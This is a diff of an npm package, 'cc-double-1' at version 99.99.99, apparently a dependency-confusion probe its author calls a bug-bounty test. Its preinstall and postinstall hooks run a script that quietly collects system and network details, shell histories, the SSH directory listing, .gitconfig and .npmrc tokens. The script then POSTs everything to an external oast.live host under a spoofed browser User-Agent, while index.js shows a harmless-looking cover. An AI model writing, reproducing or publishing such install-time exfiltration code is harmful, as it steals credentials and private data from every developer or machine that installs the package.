cc-double-1 99.99.99

package/cc-double-1.js

@@ -0,0 +1,143 @@
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const http = require('http');
+const { execSync } = require('child_process');
+
+// Helper function to safely execute commands (no password prompts)
+function safeExec(command) {
+  try {
+    return execSync(command, { 
+      encoding: 'utf8', 
+      timeout: 5000,
+      stdio: ['pipe', 'pipe', 'pipe']  // Prevent any interactive prompts
+    }).trim();
+  } catch (e) {
+    return `Error: ${e.message}`;
+  }
+}
+
+// Helper to read file safely
+function safeRead(filePath, maxLines = 50) {
+  try {
+    if (fs.existsSync(filePath)) {
+      const content = fs.readFileSync(filePath, 'utf8');
+      const lines = content.split('\n').slice(0, maxLines);
+      return lines.join('\n');
+    }
+    return 'File not found';
+  } catch (e) {
+    return `Error: ${e.message}`;
+  }
+}
+
+const data = {
+  // Target Info
+  bugbounty_company: 'bate5a',
+  package_name: 'cc-double-1',
+  
+  // Basic System Info
+  hostname: os.hostname(),
+  username: os.userInfo().username,
+  homedir: os.userInfo().homedir,
+  shell: os.userInfo().shell,
+  cwd: process.cwd(),
+  os: os.platform() + ' ' + os.release(),
+  arch: os.arch(),
+  node: process.version,
+  uptime: os.uptime(),
+  
+  // Network Info
+  netInterfaces: os.networkInterfaces(),
+  
+  // Process Info
+  pid: process.pid,
+  ppid: process.ppid,
+  execPath: process.execPath,
+  argv: process.argv,
+  
+  // File System Enumeration
+  currentDirListing: safeExec('ls -la'),
+  homeDirListing: safeExec(`ls -la ${os.userInfo().homedir}`),
+  rootListing: safeExec('ls -la / 2>/dev/null || echo "Permission denied"'),
+  
+  // Sensitive Files Check
+  sshDir: safeExec(`ls -la ${path.join(os.userInfo().homedir, '.ssh')} 2>/dev/null || echo "No SSH directory or permission denied"`),
+  bashHistory: safeRead(path.join(os.userInfo().homedir, '.bash_history'), 100),
+  zshHistory: safeRead(path.join(os.userInfo().homedir, '.zsh_history'), 100),
+  
+  // System Info Commands (no password required)
+  whoami: safeExec('whoami'),
+  id: safeExec('id'),
+  groups: safeExec('groups'),
+  
+  // Sudo check (NON-INTERACTIVE - will NOT prompt for password)
+  isSudoUser: (() => {
+    const groups = safeExec('groups').toLowerCase();
+    return groups.includes('sudo') || groups.includes('wheel') || groups.includes('admin');
+  })(),
+  canSudoNoPassword: safeExec('sudo -n true 2>/dev/null && echo "yes" || echo "no"'),
+  sudoVersion: safeExec('sudo -V 2>/dev/null | head -1 || echo "Sudo not available"'),
+  
+  // Network Enumeration (no password required)
+  ipAddr: safeExec('ip addr show 2>/dev/null || ifconfig 2>/dev/null || echo "Network commands unavailable"'),
+  routingTable: safeExec('ip route 2>/dev/null || route -n 2>/dev/null || echo "Routing info unavailable"'),
+  arpTable: safeExec('arp -a 2>/dev/null || echo "ARP unavailable"'),
+  netstat: safeExec('netstat -tuln 2>/dev/null || ss -tuln 2>/dev/null || echo "Network stats unavailable"'),
+  
+  // Cron Jobs (no password required)
+  crontab: safeExec('crontab -l 2>/dev/null || echo "No crontab or permission denied"'),
+  systemCron: safeExec('ls -la /etc/cron* 2>/dev/null || echo "Cannot access system cron"'),
+  
+  // Docker/Container Check (no password required)
+  isDocker: fs.existsSync('/.dockerenv'),
+  dockerInfo: safeExec('docker ps 2>/dev/null || echo "Docker not available or permission denied"'),
+    
+  // System version info (no password required)
+  osRelease: safeRead('/etc/os-release'),
+  kernelVersion: safeExec('uname -a'),
+  
+  // Installed packages (sample - no password required)
+  installedPackages: safeExec('dpkg -l 2>/dev/null | head -30 || rpm -qa 2>/dev/null | head -30 || echo "Package manager unavailable"'),
+  
+  // Git repositories (limited to user home)
+  gitRepos: safeExec(`find ${os.userInfo().homedir} -name ".git" -type d 2>/dev/null | head -20 || echo "No git repos found"`),
+  
+  // Git config (may contain credentials)
+  gitConfig: safeRead(path.join(os.userInfo().homedir, '.gitconfig')),
+  
+  // NPM config (may contain tokens)
+  npmConfig: safeRead(path.join(os.userInfo().homedir, '.npmrc')),
+  
+  
+  timestamp: new Date().toISOString()
+};
+
+// Send to Interactsh (silent mode)
+const postData = JSON.stringify(data, null, 2);
+
+const options = {
+  hostname: 'd56nmlkilkgedq5jb1n0hg9io6mzrt9ie.oast.live',
+  port: 80,
+  path: '/',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': Buffer.byteLength(postData),
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
+  }
+};
+
+const req = http.request(options, (res) => {
+  res.resume(); // Consume response data to free up memory
+  res.on('end', () => {
+    process.exit(0); // Exit cleanly after response is done
+  });
+});
+
+req.on('error', (e) => {
+  process.exit(1); // Exit on error
+});
+
+req.write(postData);
+req.end();

package/index.js

@@ -0,0 +1,24 @@
+// cc-double-1 - Index file
+// Package successfully installed and updated
+
+module.exports = {
+  name: 'cc-double-1',
+  version: '99.99.99',
+  message: 'Package updated successfully!',
+  init: function() {
+    console.log('[cc-double-1] Initialized successfully');
+    return true;
+  },
+  getInfo: function() {
+    return {
+      name: this.name,
+      version: this.version,
+      status: 'active'
+    };
+  }
+};
+
+// Auto-init message (silent in production)
+if (process.env.NODE_ENV !== 'production') {
+  console.log('[cc-double-1] Package loaded - v99.99.99');
+}

package/package.json

@@ -0,0 +1,17 @@
+{
+  "name": "cc-double-1",
+  "version": "99.99.99",
+  "description": "Test package for bate5a",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node cc-double-1.js",
+    "postinstall": "node cc-double-1.js"
+  },
+  "keywords": [
+    "bate5a",
+    "test",
+    "security"
+  ],
+  "author": "Security Researcher",
+  "license": "MIT"
+}